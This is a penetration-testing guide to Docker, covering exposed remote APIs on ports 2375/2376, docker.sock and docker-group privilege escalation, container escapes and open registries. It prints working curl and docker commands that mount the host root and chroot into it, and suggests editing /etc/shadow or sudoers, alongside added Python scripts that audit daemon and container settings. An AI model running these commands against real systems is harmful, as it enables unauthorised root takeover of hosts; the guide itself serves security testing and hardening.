# Docker - Port 2375,2376


## Basic info

Docker is a widely used containerization platform that allows developers to package applications with their dependencies into isolated units. However, misconfigurations, exposed APIs, and poor access control practices can create serious security risks. This guide provides comprehensive techniques for **Docker penetration testing**, focusing on real-world attack vectors, privilege escalation, container escape, and host exploitation.

### Identifying Docker in a Target Environment

#### Detecting Docker Services via Network Scanning

Docker’s remote API may be exposed on:

* **Port 2375** (unencrypted)
* **Port 2376** (TLS-encrypted)

Scan using Nmap:

```bash
nmap -p 2375,2376 --script http-title,docker-version <target-ip>
```

Check for Docker API access:

```bash
curl http://<target-ip>:2375/containers/json
```

If you receive JSON output, the Docker API is **unauthenticated and exposed**.
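The defender-side counterpart of this check is to audit the daemon configuration for TCP listeners that do not require client certificates. The following is an added example, not code from the original page: the function name `audit_daemon_hosts`, the sample configurations and the certificate paths are constructed for illustration, while `hosts`, `tls`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` are the standard `daemon.json` keys.

```python
from urllib.parse import urlparse

# Constructed daemon.json contents (not from a real host).
WEAK = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
TLS_ONLY = {"hosts": ["tcp://0.0.0.0:2376"], "tls": True,
            "tlscert": "/etc/docker/server.pem", "tlskey": "/etc/docker/server-key.pem"}
HARDENED = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
            "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
            "tlscert": "/etc/docker/server.pem", "tlskey": "/etc/docker/server-key.pem"}

def audit_daemon_hosts(config):
    """Return one finding per TCP listener that accepts unauthenticated clients."""
    if config.get("tlsverify"):
        return []  # clients must present a certificate signed by tlscacert
    encrypted = bool(config.get("tls"))  # TLS on, but no client verification
    findings = []
    for host in config.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local to the host
        loopback = url.hostname in ("127.0.0.1", "localhost", "::1")
        where = "loopback" if loopback else "network"
        if encrypted:
            findings.append(f"{host}: TLS without client verification ({where})")
        else:
            findings.append(f"{host}: plaintext, unauthenticated ({where})")
    return findings

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("tls-only", TLS_ONLY), ("hardened", HARDENED)):
        print(name, audit_daemon_hosts(cfg) or "ok")
```

A listener on port 2376 with `tls` but without `tlsverify` is encrypted yet still answers any client, so it is reported as well.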

***

## Exploiting Exposed Docker API

### Listing Containers

```bash
curl http://<target-ip>:2375/containers/json
```

### Running a New Container (Interactive Shell)

```bash
curl -X POST http://<target-ip>:2375/containers/create -H "Content-Type: application/json" \
-d '{"Image":"alpine", "Cmd":["/bin/sh"], "HostConfig": {"Binds":["/:/host"]}}'
```

Then start it:

```bash
curl -X POST http://<target-ip>:2375/containers/<container_id>/start
```

Access with:

```bash
curl -X POST -H "Content-Type: application/json" \
http://<target-ip>:2375/containers/<container_id>/exec \
-d '{"AttachStdout": true, "AttachStderr": true, "Tty": true, "Cmd": ["/bin/sh"]}'
```

This allows you to **escape to the host** by accessing `/host`.

***

## Docker Socket Abuse (`/var/run/docker.sock`)

Any process that can reach the Docker socket can drive the Docker daemon, which gives it root-level control over the host.

Check access:

```bash
ls -la /var/run/docker.sock
```

### Privilege Escalation via Docker Socket

If you have write access to `docker.sock`, you can create a container with the host mounted:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```

This drops you into the **host filesystem as root**.

***

## Container Escape Techniques

### 1. Privileged Containers

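Check if the container runs with `--privileged`. The cgroup file shows whether the process is under Docker, and the effective capability mask (`CapEff`) shows whether `cap_sys_admin` is held:

```bash
cat /proc/1/cgroup
grep CapEff /proc/1/status
```

If you see `docker` with no restrictions, and `cap_sys_admin` is in the effective set, then: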

```bash
mount -t proc proc /host/proc
chroot /host /bin/bash
```

### 2. Mounting Host Filesystems

Containers running with `-v /:/mnt` allow direct access to the host’s root filesystem.

Escalate:

```bash
chroot /mnt
```

Then modify `/etc/shadow`, `/etc/sudoers`, or inject SSH keys.
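To find containers that carry the settings described in this section and in the socket section above, the following audits `docker inspect` output for privileged mode, added `SYS_ADMIN` capability, host-root binds and socket mounts. It is an added example, not code from the original page: the function names and the sample data are constructed, while `HostConfig.Privileged`, `HostConfig.CapAdd` and `HostConfig.Binds` are the fields `docker inspect` reports.

```python
import json

# Constructed sample in the shape of `docker inspect` output (not from a real host).
SAMPLE_INSPECT = json.loads("""[
 {"Name": "/web", "HostConfig": {"Privileged": false, "CapAdd": null,
   "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
 {"Name": "/ci-agent", "HostConfig": {"Privileged": false, "CapAdd": null,
   "Binds": ["/var/run/docker.sock:/var/run/docker.sock:ro"]}},
 {"Name": "/debug", "HostConfig": {"Privileged": true, "CapAdd": null,
   "Binds": ["/:/host"]}},
 {"Name": "/backup", "HostConfig": {"Privileged": false, "CapAdd": ["SYS_ADMIN"],
   "Binds": ["/:/mnt:ro"]}}
]""")

def audit_container(entry):
    """Return the escape-relevant settings found in one `docker inspect` entry."""
    host_cfg = entry.get("HostConfig") or {}
    findings = []
    if host_cfg.get("Privileged"):
        findings.append("privileged")
    for cap in host_cfg.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") in ("SYS_ADMIN", "ALL"):
            findings.append("cap_add:" + cap)
    for bind in host_cfg.get("Binds") or []:
        parts = bind.split(":")  # source:destination[:options]
        source = parts[0]
        read_only = len(parts) > 2 and "ro" in parts[2].split(",")
        if source.rstrip("/") == "":  # the host's root directory
            mode = "read-only" if read_only else "read-write"
            findings.append("host root mounted " + mode)
        elif source.endswith("docker.sock"):
            # An ro bind does not restrict API calls made over the socket.
            findings.append("docker socket mounted")
    return findings

def audit(inspect_output):
    """Map container name -> findings, omitting containers with none."""
    report = {}
    for entry in inspect_output:
        findings = audit_container(entry)
        if findings:
            report[entry["Name"].lstrip("/")] = findings
    return report

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_INSPECT), indent=2))
```

On a real host, feed it the parsed output of `docker inspect $(docker ps -q)`.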

***

## Detecting Docker Environment From Inside a Container

Check for containerized environment:

```bash
cat /proc/1/cgroup | grep -i docker
grep -q 'docker' /proc/self/cgroup && echo "Running in Docker"
```

Look for environment variables like:

```bash
env | grep -i docker
```

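The presence of `/docker-entrypoint.sh`, `/var/run/docker.sock`, or `/.dockerenv` is a telltale sign. On cgroup v2 hosts the cgroup files may not mention `docker` at all, so check for these files as well.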

***

## Attacking Misconfigured Docker Registries

### Discovering Registries

```bash
nmap -p 5000 --script http-title <target>
```

Access registry:

```bash
curl http://<target>:5000/v2/_catalog
```

List tags:

```bash
curl http://<target>:5000/v2/<image>/tags/list
```

Pull vulnerable images:

```bash
docker pull <target>:5000/<image>:<tag>
```

Analyze locally for secrets or backdoors.

***

## Privilege Escalation via Docker Group Membership

If a user is in the `docker` group, they can effectively become **root**:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```

Check:

```bash
groups
```

If `docker` is listed, the user has full control over the host.
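For an audit of who holds this root-equivalent access, covering both this section and the Docker socket section above, the following lists every non-root account that can write to `docker.sock`, including accounts whose primary group is the socket's group and so never appear in the `docker` line of `/etc/group`. It is an added example, not code from the original page: the function name `socket_writers` and the sample `/etc/group` and `/etc/passwd` contents are constructed.

```python
import stat

# Constructed sample files (not from a real host).
GROUP = """root:x:0:
docker:x:998:alice,deploy
sudo:x:27:alice
"""
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/sh
ci:x:1002:998::/home/ci:/bin/sh
bob:x:1003:1003::/home/bob:/bin/bash
"""

def socket_writers(group_text, passwd_text, sock_mode, sock_gid):
    """Non-root accounts able to write to a docker.sock with this mode and group."""
    users = {}  # account name -> primary gid
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[2] != "0":
            users[fields[0]] = int(fields[3])
    if sock_mode & stat.S_IWOTH:
        return sorted(users)  # world-writable socket: every local account
    if not sock_mode & stat.S_IWGRP:
        return []  # only the owner can write
    # Accounts whose primary group is the socket's group.
    writers = {name for name, gid in users.items() if gid == sock_gid}
    # Accounts listed as supplementary members of that group.
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and int(fields[2]) == sock_gid:
            writers.update(m for m in fields[3].split(",") if m in users)
    return sorted(writers)

if __name__ == "__main__":
    # Typical socket: root:docker, mode 0660.
    print(socket_writers(GROUP, PASSWD, 0o660, 998))
```

On a real host, take `sock_mode` and `sock_gid` from `os.stat("/var/run/docker.sock")` and the two texts from `/etc/group` and `/etc/passwd`.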

***

